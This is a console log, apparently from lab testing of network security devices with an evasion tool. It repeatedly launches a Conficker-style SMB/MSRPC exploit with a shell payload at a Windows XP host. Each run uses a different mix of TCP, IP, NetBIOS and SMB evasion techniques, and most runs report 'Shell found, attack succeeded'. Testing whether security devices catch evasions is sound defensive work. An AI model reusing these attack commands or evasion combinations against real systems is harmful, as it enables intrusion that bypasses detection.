- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56190 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=0a5UmP7w6is --evasion=[smb_openpipe,msrpc_bind]smb_decoytrees,"4","3","8","random" --evasion=[netbios_connect,msrpc_req]tcp_paws,"50%","268435453","random" --verifydelay=1000 --payload=shell
- Info: Using random seed 0a5UmP7w6iv
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 8 random bytes.
- Info: NetBIOS connection 10.62.90.110:56190 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 2015-06-07 23:49:01 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41902 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=Q5L+wNSEXnI --evasion=[netbios_connect,end]tcp_paws,"50%","9","shuffle" --evasion=[smb_connect,smb_openpipe]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed Q5L+wNSEXnJ
- The following evasions are applied from stage netbios_connect to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has shuffled original payload
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.115:41902 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ............
- 3512 runs averaging 1.98 runs / second ; progress: 1776/43200....2015-06-07 23:49:08 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15024 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=95HG3rTHFuU --evasion=[smb_connect,end]tcp_paws,"5","4","random" --evasion=[netbios_connect,msrpc_bind]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed 95HG3rTHFuX
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_connect to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.118:15024 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ........
- 3525 runs averaging 1.98 runs / second ; progress: 1781/43200.......2015-06-07 23:49:15 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49718 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=v9g23QstAps --evasion=[msrpc_req,end]tcp_paws,"1","6","shuffle30" --evasion=[smb_opentree,smb_openpipe]tcp_urgent,"21","random" --verifydelay=1000 --payload=shell
- Info: Using random seed v9g23QstApu
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Add a random urgent data byte to every 21 TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 30 bytes of original payload, then shuffled original payload
- Info: NetBIOS connection 10.62.90.114:49718 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 3533 runs averaging 1.98 runs / second ; progress: 1786/43200...
- 3536 runs averaging 1.97 runs / second ; progress: 1791/43200.........
- 3545 runs averaging 1.97 runs / second ; progress: 1796/43200.............
- 3558 runs averaging 1.98 runs / second ; progress: 1801/43200..Pid 22433 timed out - killed
- 2015-06-07 23:49:31 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64787 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=dTcq453vXsM --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"6","3","5","random_msrpcbind" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"8","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed dTcq453vXsN
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a zero urgent data byte to every 8 TCP segment.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Before normal SMB writes, 6 SMB trees are opened and 3 writes are performed to them. The write payload is 5 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.111:64787 -> 10.35.1.207:445
- Terminated
- ......
- 3567 runs averaging 1.98 runs / second ; progress: 1806/43200....
- 3571 runs averaging 1.97 runs / second ; progress: 1811/43200.....2015-06-07 23:49:45 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47268 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=EyGsPHL3uk8 --evasion=[smb_connect,end]ipv4_frag,"64" --evasion=[smb_openpipe,msrpc_req]smb_fnameobf,"add_paths|add_null_trailer" --evasion=[smb_opentree,msrpc_req]tcp_paws,"75%","268435455","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed EyGsPHL3uk8
- The following evasions are applied from stage smb_connect to end:
- - IPv4 fragments with at most 64 bytes per fragment
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - The SMB filename is obfuscated:
- * Dummy paths are added ( a/b -> a/c/../b )
- * A 0x00 and random alphanumeric characters are appended to the filename
- Info: NetBIOS connection 10.62.90.118:47268 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 3578 runs averaging 1.97 runs / second ; progress: 1816/43200.......2015-06-07 23:49:48 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59606 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=uzhULV6jsqk --evasion=[start,end]tcp_initialseq,"2412100352" --evasion=[smb_opentree,end]tcp_paws,"5","162865477","shuffle30" --verifydelay=1000 --payload=shell
- Info: Using random seed uzhULV6jsqm
- - Initial TCP sequence number is set to 0xffffffff - 2412100352
- The following evasions are applied from stage smb_opentree to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 162865477> and has 30 bytes of original payload, then shuffled original payload
- Info: NetBIOS connection 10.62.90.115:59606 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ....2015-06-07 23:49:49 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17836 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=cDSiqqCXSA0 --evasion=[netbios_connect,smb_connect]netbios_chaff,"5","empty_unspec|empty_keepalive|http_get" --evasion=[start,end]tcp_paws,"1","6","alphanumrandomized" --evasion=[netbios_connect,smb_opentree]tcp_paws,"1","167083599","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed cDSiqqCXSA1
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 167083599> and has shuffled original payload
- The following evasions are applied from stage netbios_connect to smb_connect:
- - Before every 5th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload.
- Info: NetBIOS connection 10.62.90.110:17836 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....
- 3596 runs averaging 1.98 runs / second ; progress: 1821/43200...........
- 3607 runs averaging 1.98 runs / second ; progress: 1826/43200.............
- 3620 runs averaging 1.98 runs / second ; progress: 1831/43200............
- 3632 runs averaging 1.98 runs / second ; progress: 1836/43200.......
- 3639 runs averaging 1.98 runs / second ; progress: 1841/43200.
- 3640 runs averaging 1.97 runs / second ; progress: 1846/43200.Pid 23089 timed out - killed
- 2015-06-07 23:50:20 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24335 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=OwJGCORFO5M --evasion=msrpc_bigendian --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
- Info: Using random seed OwJGCORFO5M
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a random urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage msrpc_bind to end:
- - MSRPC messages are sent in the big endian byte order
- Info: NetBIOS connection 10.62.90.117:24335 -> 10.35.1.207:445
- Terminated
- ..
- 3644 runs averaging 1.97 runs / second ; progress: 1851/43200...........
- 3655 runs averaging 1.97 runs / second ; progress: 1856/43200..........
- 3665 runs averaging 1.97 runs / second ; progress: 1861/43200..........
- 3675 runs averaging 1.97 runs / second ; progress: 1866/43200..........
- 3685 runs averaging 1.97 runs / second ; progress: 1871/43200........
- 3693 runs averaging 1.97 runs / second ; progress: 1876/43200...............
- 3708 runs averaging 1.97 runs / second ; progress: 1881/43200.........
- 3717 runs averaging 1.97 runs / second ; progress: 1886/43200.....
- 3722 runs averaging 1.97 runs / second ; progress: 1891/43200...2015-06-07 23:51:05 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52841 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=BoBFFh41OV0 --evasion=[smb_connect,end]smb_decoytrees,"6","7","2","random_msrpcreq" --evasion=[smb_opentree,smb_openpipe]tcp_chaff,"1","chksum|nullchksum|nullflag|shorthdr|longhdr","unmodified" --verifydelay=1000 --payload=shell
- Info: Using random seed BoBFFh41OV0
- The following evasions are applied from stage smb_connect to end:
- - Before normal SMB writes, 6 SMB trees are opened and 7 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- Info: NetBIOS connection 10.62.90.118:52841 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 3726 runs averaging 1.97 runs / second ; progress: 1896/43200........
- 3734 runs averaging 1.96 runs / second ; progress: 1901/43200......
- 3740 runs averaging 1.96 runs / second ; progress: 1906/43200..
- 3742 runs averaging 1.96 runs / second ; progress: 1911/43200.
- 3743 runs averaging 1.95 runs / second ; progress: 1916/43200....
- 3747 runs averaging 1.95 runs / second ; progress: 1921/43200........
- 3755 runs averaging 1.95 runs / second ; progress: 1926/43200.....
- 3760 runs averaging 1.95 runs / second ; progress: 1931/43200.....
- 3765 runs averaging 1.94 runs / second ; progress: 1936/43200..
- 3767 runs averaging 1.94 runs / second ; progress: 1941/43200
- 3767 runs averaging 1.94 runs / second ; progress: 1946/43200
- 3767 runs averaging 1.93 runs / second ; progress: 1951/43200.Pid 24808 timed out - killed
- 2015-06-07 23:52:06 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=12134 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=5K839hgA4vk --evasion=[netbios_connect,smb_opentree]ipv4_frag,"40" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed 5K839hgA4vn
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - IPv4 fragments with at most 40 bytes per fragment
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a random alphanumeric urgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.113:12134 -> 10.35.1.207:445
- Terminated
- 3769 runs averaging 1.93 runs / second ; progress: 1956/43200.........
- 3778 runs averaging 1.93 runs / second ; progress: 1961/43200.....
- 3783 runs averaging 1.92 runs / second ; progress: 1966/43200..........
- 3793 runs averaging 1.92 runs / second ; progress: 1971/43200...
- 3796 runs averaging 1.92 runs / second ; progress: 1976/43200
- 3796 runs averaging 1.92 runs / second ; progress: 1981/43200Pid 25171 timed out - killed
- 2015-06-07 23:52:33 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52248 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=dytugDvpAqY --evasion=[smb_connect,msrpc_req]tcp_paws,"25%","2","alpharandomized" --evasion=[netbios_connect,smb_opentree]tcp_segvar,"6","65535" --evasion=[smb_connect,smb_openpipe]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed dytugDvpAqZ
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - TCP packets are segmented to contain between 6 and 65535 bytes of payload.
- The following evasions are applied from stage smb_connect to msrpc_req:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.112:52248 -> 10.35.1.207:445
- Terminated
- .....
- 3802 runs averaging 1.91 runs / second ; progress: 1986/43200.2015-06-07 23:52:37 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=36884 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=s9eB1BzGzzo --evasion=[smb_openpipe,msrpc_req]tcp_paws,"75%","268435454","alphanumrandomized" --evasion=[netbios_connect,smb_opentree]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed s9eB1BzGzzq
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.112:36884 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .......
- 3811 runs averaging 1.91 runs / second ; progress: 1991/43200...............
- 3826 runs averaging 1.92 runs / second ; progress: 1996/43200....
- 3830 runs averaging 1.91 runs / second ; progress: 2002/43200........
- 3838 runs averaging 1.91 runs / second ; progress: 2007/43200........
- 3846 runs averaging 1.91 runs / second ; progress: 2012/43200.............
- 3859 runs averaging 1.91 runs / second ; progress: 2017/43200...Pid 25922 timed out - killed
- 2015-06-07 23:53:10 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=54207 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=h6bw8nvRfdk --evasion=[msrpc_bind,msrpc_req]tcp_order,"rand" --evasion=[netbios_connect,msrpc_bind]tcp_overlap,"7","new","zero" --evasion=[smb_openpipe,end]tcp_seg,"7" --verifydelay=1000 --payload=shell
- Info: Using random seed h6bw8nvRfdm
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - TCP segments are set to overlap by 7 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload
- The following evasions are applied from stage smb_openpipe to end:
- - TCP packets are segmented to contain at most 7 bytes of payload.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - TCP segments produced by a single socket send() are sent in a random order
- Info: NetBIOS connection 10.62.90.116:54207 -> 10.35.1.207:445
- Terminated
- ..
- 3865 runs averaging 1.91 runs / second ; progress: 2022/43200.2015-06-07 23:53:13 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11317 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=QVdIvWYv1gI --evasion=[smb_opentree,end]tcp_paws,"3","7","random" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"5","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed QVdIvWYv1gJ
- The following evasions are applied from stage smb_opentree to end:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has random bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Add a random alphaurgent data byte to every 5 TCP segment.
- Info: NetBIOS connection 10.62.90.113:11317 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 3870 runs averaging 1.91 runs / second ; progress: 2027/43200......
- 3876 runs averaging 1.91 runs / second ; progress: 2032/43200.2015-06-07 23:53:22 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62100 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=uZVoYbn3bLE --evasion=[smb_openpipe,end]netbios_chaff,"1","empty_unspec|empty_keepalive|small_unspec|http_get|broken_length" --evasion=[smb_openpipe,end]tcp_paws,"8","102823530","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed uZVoYbn3bLG
- The following evasions are applied from stage smb_openpipe to end:
- - Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 102823530> and has random alpha bytes as payload
- - Before every 1th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- Info: NetBIOS connection 10.62.90.118:62100 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ............
- 3890 runs averaging 1.91 runs / second ; progress: 2037/43200...............
- 3905 runs averaging 1.91 runs / second ; progress: 2042/43200..........
- 3915 runs averaging 1.91 runs / second ; progress: 2047/43200Pid 26530 timed out - killed
- 2015-06-07 23:53:37 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45731 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=HlA8q8WZBQg --evasion=[msrpc_bind,end]msrpc_ndrflag,"char_unspec","float_vax","byte3_nonzero","byte4_nonzero" --evasion=[msrpc_bind,msrpc_req]smb_chaff,"21","write_flag","msrpc" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed HlA8q8WZBQg
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to add a random alphaurgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- The following evasions are applied from stage msrpc_bind to end:
- - MSRPC NDR flag is modified:
- * Unspecified character encoding
- * VAX floating point value encoding
- * Reserved 3rd byte is set to a random non-zero value
- * Reserved 4th byte is set to a random non-zero value
- Info: NetBIOS connection 10.62.90.119:45731 -> 10.35.1.207:445
- Terminated
- .........
- 3925 runs averaging 1.91 runs / second ; progress: 2052/43200..............
- 3939 runs averaging 1.91 runs / second ; progress: 2057/43200.......
- 3946 runs averaging 1.91 runs / second ; progress: 2062/43200
- 3946 runs averaging 1.91 runs / second ; progress: 2067/43200
- 3946 runs averaging 1.90 runs / second ; progress: 2072/43200.........
- 3955 runs averaging 1.90 runs / second ; progress: 2077/43200.........
- 3964 runs averaging 1.90 runs / second ; progress: 2082/43200.........2015-06-07 23:54:16 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26191 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=CWCzNaZMK7E --evasion=[start,msrpc_bind]tcp_chaff,"3","chksum|nullflag|outofwindow|shorthdr|longhdr","random_alpha" --evasion=[smb_connect,msrpc_req]tcp_paws,"2","212579014","alphanumrandomized" --evasion=[msrpc_bind,end]tcp_paws,"1","268435453","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed CWCzNaZMK7E
- The following evasions are applied from stage start to msrpc_bind:
- - With every 3 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has random alpha bytes as payload
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 212579014> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.112:26191 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- .
- 3975 runs averaging 1.90 runs / second ; progress: 2087/43200...........
- 3986 runs averaging 1.91 runs / second ; progress: 2092/43200..Pid 27448 timed out - killed
- 2015-06-07 23:54:23 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63893 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=TYsSONBPM0I --evasion=[smb_openpipe,msrpc_req]ipv4_frag,"32" --evasion=[netbios_connect,msrpc_req]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed TYsSONBPM0J
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - IPv4 fragments with at most 32 bytes per fragment
- Info: NetBIOS connection 10.62.90.114:63893 -> 10.35.1.207:445
- Terminated
- ..........
- 3999 runs averaging 1.91 runs / second ; progress: 2097/43200............
- 4011 runs averaging 1.91 runs / second ; progress: 2102/43200.................
- 4028 runs averaging 1.91 runs / second ; progress: 2107/43200.............
- 4041 runs averaging 1.91 runs / second ; progress: 2112/43200....
- 4045 runs averaging 1.91 runs / second ; progress: 2117/43200
- 4045 runs averaging 1.91 runs / second ; progress: 2122/43200...
- 4048 runs averaging 1.90 runs / second ; progress: 2127/43200...............
- 4063 runs averaging 1.91 runs / second ; progress: 2132/43200..........
- 4073 runs averaging 1.91 runs / second ; progress: 2137/43200.2015-06-07 23:55:08 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13755 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=UGUgfnLSS3I --evasion=[msrpc_req,end]smb_chaff,"3","write_flag","rand" --evasion=[msrpc_bind,msrpc_req]smb_writeandxpad,"10","zero" --evasion=[netbios_connect,end]tcp_paws,"25%","9","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed UGUgfnLSS3J
- The following evasions are applied from stage netbios_connect to end:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - 10 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
- The following evasions are applied from stage msrpc_req to end:
- - Before every 3th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random payload
- Info: NetBIOS connection 10.62.90.112:13755 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ........
- 4083 runs averaging 1.91 runs / second ; progress: 2142/43200.....
- 4088 runs averaging 1.90 runs / second ; progress: 2147/43200.....
- 4093 runs averaging 1.90 runs / second ; progress: 2152/43200......
- 4099 runs averaging 1.90 runs / second ; progress: 2157/43200...........
- 4110 runs averaging 1.90 runs / second ; progress: 2162/43200..Pid 28656 timed out - killed
- 2015-06-07 23:55:34 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40200 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=Psu0DJsbrY8 --evasion=[msrpc_bind,msrpc_req]tcp_chaff,"75%","chksum|nullchksum|nullflag|shorthdr","random" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed Psu0DJsbrY8
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP checksum.
- * NULL TCP control flags.
- * TCP header shorter than 20 bytes
- * Duplicate packet has random bytes as payload
- Info: NetBIOS connection 10.62.90.115:40200 -> 10.35.1.207:445
- Terminated
- ....2015-06-07 23:55:37 INFO
- Success. (10.62.90.116):
